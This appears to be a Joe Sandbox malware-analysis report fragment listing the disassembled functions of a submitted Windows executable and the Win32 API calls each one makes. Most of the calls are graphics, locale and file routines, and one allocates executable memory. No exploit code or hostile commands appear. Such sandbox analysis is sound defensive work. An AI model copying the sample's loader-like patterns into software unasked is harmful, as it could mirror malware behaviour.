Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0041C830, Relevance: 1.3, APIs: 1, Instructions: 52

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C84E

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 004013C8, Relevance: 1.3, APIs: 1, Instructions: 34

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,004645F4,0040142B,?,?,004014CB,?,?,?,00000000,00004003,00401A0B), ref: 004013DB

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 003C3AAE, Relevance: 1.3, APIs: 1, Instructions: 12

APIs

CloseHandle.KERNEL32 ref: 003C3AB2

Memory Dump Source

Source File: 00000002.00000002.185747000.003C0000.00000040.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3c0000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Non-executed Functions

Function 004232C4, Relevance: 48.5, APIs: 32, Instructions: 500

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 00423344
GetDC.USER32(00000000), ref: 00423355
CreateCompatibleDC.GDI32(00000000), ref: 00423366
CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000,00000000,00423912,?,00000000,00000000), ref: 004233B2
CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 004233D6
GetDeviceCaps.GDI32(00000028,0000000C), ref: 00423426
GetDeviceCaps.GDI32(00000028,0000000E), ref: 00423433
SelectObject.GDI32(?,?), ref: 0042353B

Part of subcall function 004205D4: GetObjectA.GDI32(?,00000004), ref: 004205EB
Part of subcall function 004205D4: GetPaletteEntries.GDI32(?,00000000,?), ref: 0042060E

SelectObject.GDI32(?,00000000), ref: 004234DD
GetDIBColorTable.GDI32(?,00000000,00000100,-00000027), ref: 00423503
GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000001,00000000), ref: 0042352E
CreateDIBSection.GDI32(00000028,00000001,00000000,00000003,00000000,00000000), ref: 00423591
GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000001,00000000), ref: 004235F2

Part of subcall function 0041FD98: GetLastError.KERNEL32(00000000,0041FE34), ref: 0041FDB8
Part of subcall function 0041FD98: FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041FE34), ref: 0041FDDE

SelectObject.GDI32(?,?), ref: 00423633
SelectPalette.GDI32(?,00000000,00000000), ref: 00423673
RealizePalette.GDI32(?), ref: 0042367F
SelectPalette.GDI32(?,?,000000FF), ref: 0042388A

Part of subcall function 0041F29C: CreateBrushIndirect.GDI32(?), ref: 0041F346

FillRect.USER32(?,?,?), ref: 004236D0
SetTextColor.GDI32(?,00000000), ref: 004236E8
SetBkColor.GDI32(?,00000000), ref: 00423702
SetDIBColorTable.GDI32(?,00000000,00000002,?), ref: 0042374A
PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062,00000000,00423890,?,00000000,004238B2,?,00000000,004238C3,?,?), ref: 0042376C
CreateCompatibleDC.GDI32(00000028), ref: 0042377F
SelectObject.GDI32(?,00000000), ref: 004237A2
SelectPalette.GDI32(?,00000000,00000000), ref: 004237BE
RealizePalette.GDI32(?), ref: 004237C9
DeleteDC.GDI32(?), ref: 00423860

Part of subcall function 0041E5DC: GetSysColor.USER32 ref: 0041E5E6

SetTextColor.GDI32(?,00000000), ref: 004237E7
SetBkColor.GDI32(?,00000000), ref: 00423801
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00423829
SelectPalette.GDI32(?,00000000,000000FF), ref: 0042383B
SelectObject.GDI32(?,00000000), ref: 00423845

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0040598C, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004059A9
GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059BA
lstrcpyn.KERNEL32(?,?,?,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059EA
lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405A4E

Part of subcall function 00405978: CharNextA.USER32(?), ref: 0040597B

lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001), ref: 00405A83
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49), ref: 00405A96
FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000), ref: 00405AA3
lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC), ref: 00405AAF
lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405AE3
lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405AEF
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405B11

Strings

kernel32.dll, xrefs: 004059A4
\, xrefs: 00405AC1
GetLongPathNameA, xrefs: 004059B4

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00456690, Relevance: 7.6, APIs: 5, Instructions: 59

APIs

IsIconic.USER32(00000000), ref: 00456698
SetActiveWindow.USER32(00000000), ref: 004566B0
IsWindowEnabled.USER32(00000000), ref: 004566D3
SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040), ref: 004566FC
DefWindowProcA.USER32(00000000,00000112,0000F020,00000000), ref: 00456711

Part of subcall function 00455738: ShowWindow.USER32(00000000,00000006), ref: 00455753

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 004087A4, Relevance: 6.0, APIs: 4, Instructions: 37

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004087BF
FindClose.KERNEL32(00000000,00000000,?), ref: 004087CA
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004087E3
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 004087F4

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00422C80, Relevance: 4.6, APIs: 3, Instructions: 51

APIs

GetClipboardData.USER32(0000000E), ref: 00422C8D
CopyEnhMetaFileA.GDI32(00000000,00000000), ref: 00422CAF
GetEnhMetaFileHeader.GDI32(?,00000064,?), ref: 00422CC1

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0041FD98, Relevance: 3.0, APIs: 2, Instructions: 46

APIs

GetLastError.KERNEL32(00000000,0041FE34), ref: 0041FDB8
FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041FE34), ref: 0041FDDE

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0040AA6C, Relevance: 3.0, APIs: 2, Instructions: 37

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040AAD0), ref: 0040AA92
GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040AAD0), ref: 0040AAAB

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00408914, Relevance: 1.6, APIs: 1, Instructions: 53

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0040893D

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00413784, Relevance: 1.6, APIs: 1, Instructions: 53

APIs

FindResourceA.KERNEL32(?,00000000,0000000A), ref: 004137A6

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00420328, Relevance: 1.5, APIs: 1, Instructions: 37

APIs

GetSystemInfo.KERNEL32(?), ref: 00420338

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0040976C, Relevance: 1.5, APIs: 1, Instructions: 29

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 004097B8, Relevance: 1.5, APIs: 1, Instructions: 23

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000002), ref: 004097CB

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0040A6C0, Relevance: 1.5, APIs: 1, Instructions: 20

APIs

GetVersionExA.KERNEL32 ref: 0040A6CE

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0041FFE4, Relevance: 37.7, APIs: 25, Instructions: 248

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00420027
SelectObject.GDI32(?,?), ref: 0042003C
MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042008B
SelectObject.GDI32(?,?), ref: 004200A5
DeleteObject.GDI32(?), ref: 004200B1
CreateCompatibleDC.GDI32(00000000), ref: 004200C5
CreateCompatibleBitmap.GDI32(?,?,?), ref: 004200E6
SelectObject.GDI32(?,?), ref: 004200FB
SelectPalette.GDI32(?,070806DB,00000000), ref: 0042010F
SelectPalette.GDI32(?,?,00000000), ref: 00420121
SelectPalette.GDI32(?,00000000,000000FF), ref: 00420136
SelectPalette.GDI32(?,070806DB,000000FF), ref: 0042014C
RealizePalette.GDI32(?), ref: 00420158
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042017A
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0042019C
SetTextColor.GDI32(?,00000000), ref: 004201A4
SetBkColor.GDI32(?,00FFFFFF), ref: 004201B2
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004201DE
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420203
SetTextColor.GDI32(?,?), ref: 0042020D
SetBkColor.GDI32(?,?), ref: 00420217
SelectObject.GDI32(?,00000000), ref: 0042022A
DeleteObject.GDI32(?), ref: 00420233
SelectPalette.GDI32(?,00000000,00000000), ref: 00420255
DeleteDC.GDI32(?), ref: 0042025E

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0042398C, Relevance: 31.7, APIs: 21, Instructions: 194

APIs

GetObjectA.GDI32(?,00000054,?), ref: 004239AF
GetDC.USER32(00000000), ref: 004239DD
CreateCompatibleDC.GDI32(?), ref: 004239EE
CreateBitmap.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,00423B87,?,?,00000054,?), ref: 00423A09
SelectObject.GDI32(?,00000000), ref: 00423A23
PatBlt.GDI32(?,00000000,00000000,?,?,00000042,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000), ref: 00423A45
CreateCompatibleDC.GDI32(?), ref: 00423A53
DeleteDC.GDI32(?), ref: 00423B39

Part of subcall function 004232C4: GetObjectA.GDI32(00000000,00000054,?), ref: 00423344
Part of subcall function 004232C4: GetDC.USER32(00000000), ref: 00423355
Part of subcall function 004232C4: CreateCompatibleDC.GDI32(00000000), ref: 00423366
Part of subcall function 004232C4: CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000,00000000,00423912,?,00000000,00000000), ref: 004233B2
Part of subcall function 004232C4: CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 004233D6
Part of subcall function 004232C4: GetDeviceCaps.GDI32(00000028,0000000C), ref: 00423426
Part of subcall function 004232C4: GetDeviceCaps.GDI32(00000028,0000000E), ref: 00423433
Part of subcall function 004232C4: SelectObject.GDI32(?,00000000), ref: 004234DD
Part of subcall function 004232C4: GetDIBColorTable.GDI32(?,00000000,00000100,-00000027), ref: 00423503
Part of subcall function 004232C4: GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000001,00000000), ref: 0042352E
Part of subcall function 004232C4: SelectObject.GDI32(?,?), ref: 0042353B
Part of subcall function 004232C4: CreateDIBSection.GDI32(00000028,00000001,00000000,00000003,00000000,00000000), ref: 00423591
Part of subcall function 004232C4: GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000001,00000000), ref: 004235F2
Part of subcall function 004232C4: SelectObject.GDI32(?,?), ref: 00423633
Part of subcall function 004232C4: SelectPalette.GDI32(?,00000000,00000000), ref: 00423673
Part of subcall function 004232C4: RealizePalette.GDI32(?), ref: 0042367F
Part of subcall function 004232C4: FillRect.USER32(?,?,?), ref: 004236D0
Part of subcall function 004232C4: SetTextColor.GDI32(?,00000000), ref: 004236E8
Part of subcall function 004232C4: SetBkColor.GDI32(?,00000000), ref: 00423702
Part of subcall function 004232C4: SetDIBColorTable.GDI32(?,00000000,00000002,?), ref: 0042374A
Part of subcall function 004232C4: PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062,00000000,00423890,?,00000000,004238B2,?,00000000,004238C3,?,?), ref: 0042376C
Part of subcall function 004232C4: CreateCompatibleDC.GDI32(00000028), ref: 0042377F
Part of subcall function 004232C4: SelectObject.GDI32(?,00000000), ref: 004237A2
Part of subcall function 004232C4: SelectPalette.GDI32(?,00000000,00000000), ref: 004237BE
Part of subcall function 004232C4: RealizePalette.GDI32(?), ref: 004237C9
Part of subcall function 004232C4: SetTextColor.GDI32(?,00000000), ref: 004237E7
Part of subcall function 004232C4: SetBkColor.GDI32(?,00000000), ref: 00423801
Part of subcall function 004232C4: BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00423829
Part of subcall function 004232C4: SelectPalette.GDI32(?,00000000,000000FF), ref: 0042383B
Part of subcall function 004232C4: SelectObject.GDI32(?,00000000), ref: 00423845
Part of subcall function 004232C4: DeleteDC.GDI32(?), ref: 00423860
Part of subcall function 004232C4: SelectPalette.GDI32(?,?,000000FF), ref: 0042388A

SelectObject.GDI32(?), ref: 00423A9B
SelectPalette.GDI32(?,?,00000000), ref: 00423AAE
RealizePalette.GDI32(?), ref: 00423AB7
SelectPalette.GDI32(?,?,00000000), ref: 00423AC3
RealizePalette.GDI32(?), ref: 00423ACC
SetBkColor.GDI32(?), ref: 00423AD6
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00423AFA
SetBkColor.GDI32(?,00000000), ref: 00423B04
SelectObject.GDI32(?,00000000), ref: 00423B17
DeleteObject.GDI32 ref: 00423B23
SelectObject.GDI32(?,00000000), ref: 00423B54
DeleteDC.GDI32(00000000), ref: 00423B70
ReleaseDC.USER32(00000000,00000000), ref: 00423B81

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00424708, Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351

APIs

GetDC.USER32(00000000), ref: 00424972
CreateCompatibleDC.GDI32(?), ref: 004249D7
CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 004249EC
SelectObject.GDI32(?,00000000), ref: 004249F6
DeleteObject.GDI32(00000000), ref: 00424AA9

Part of subcall function 00420530: CreateCompatibleDC.GDI32(00000000), ref: 00420549
Part of subcall function 00420530: SelectObject.GDI32(00000000), ref: 00420552
Part of subcall function 00420530: GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 00420566
Part of subcall function 00420530: SelectObject.GDI32(00000000,00000000), ref: 00420572
Part of subcall function 00420530: DeleteDC.GDI32(00000000), ref: 00420578
Part of subcall function 00420530: CreatePalette.GDI32 ref: 004205BE

SelectPalette.GDI32(?,?,00000000), ref: 00424A26
RealizePalette.GDI32(?), ref: 00424A32
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 00424A56
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00424AAF,?,?,00000000,?,00000001,00000001,?,00000000), ref: 00424A64
SelectPalette.GDI32(?,00000000,000000FF), ref: 00424A96
SelectObject.GDI32(?,?), ref: 00424AA3
CreateDIBSection.GDI32(?,?,00000000,00000000,00000000,00000000), ref: 00424AF4
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00424B73,?,00000000,?,00000000,00424C25,?,?), ref: 00424B08

Part of subcall function 0040B04C: GetLastError.KERNEL32(00000000,0040B0DC), ref: 0040B066

ReleaseDC.USER32(00000000,?), ref: 00424B6D

Strings

BM, xrefs: 0042482C
(, xrefs: 004248C1

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00423E8E, Relevance: 21.2, APIs: 14, Instructions: 218

APIs

Part of subcall function 00424420: GetDC.USER32(00000000), ref: 00424476
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
Part of subcall function 00424420: CreateHalftonePalette.GDI32(00000000), ref: 004244B9
Part of subcall function 00424420: ReleaseDC.USER32(00000000,00000000), ref: 004244C4

SelectPalette.GDI32(?,?,000000FF), ref: 00423ED2
RealizePalette.GDI32(?), ref: 00423EE1
GetDeviceCaps.GDI32(?,0000000C), ref: 00423EF3
GetDeviceCaps.GDI32(?,0000000E), ref: 00423F02
GetBrushOrgEx.GDI32(?,?), ref: 00423F36
SetStretchBltMode.GDI32(?,00000004), ref: 00423F44
SetBrushOrgEx.GDI32(?,?,?), ref: 00423F5C
SetStretchBltMode.GDI32(00000000,00000003), ref: 00423F79
SelectPalette.GDI32(?,?,000000FF), ref: 004240C7

Part of subcall function 004243C0: DeleteObject.GDI32(?), ref: 004243E3

CreateCompatibleDC.GDI32(00000000), ref: 00423FD9
SelectObject.GDI32(?,?), ref: 00423FEE

Part of subcall function 0041FFE4: CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00420027
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 0042003C
Part of subcall function 0041FFE4: MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042008B
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 004200A5
Part of subcall function 0041FFE4: DeleteObject.GDI32(?), ref: 004200B1
Part of subcall function 0041FFE4: CreateCompatibleDC.GDI32(00000000), ref: 004200C5
Part of subcall function 0041FFE4: CreateCompatibleBitmap.GDI32(?,?,?), ref: 004200E6
